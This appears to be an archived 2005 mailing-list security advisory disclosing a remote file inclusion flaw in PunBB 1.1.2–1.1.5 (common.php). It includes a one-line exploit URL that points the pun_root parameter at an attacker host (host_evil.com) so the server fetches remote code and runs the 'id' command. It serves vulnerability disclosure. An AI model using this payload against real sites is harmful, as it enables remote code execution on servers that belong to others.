<<< Date Index >>>     <<< Thread Index >>>

Remote File Inclusion in forum PunBB




Remote File Inclusion in forum PunBB

Date:24/10/2005

Severity: High

version: 1.1.2 >> 1.1.5

The bug reside in common.php



Exploit :

http://www.host.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id


Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

_________________________________________________________________
FREE pop-up blocking with the new MSN Toolbar - get it now! http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/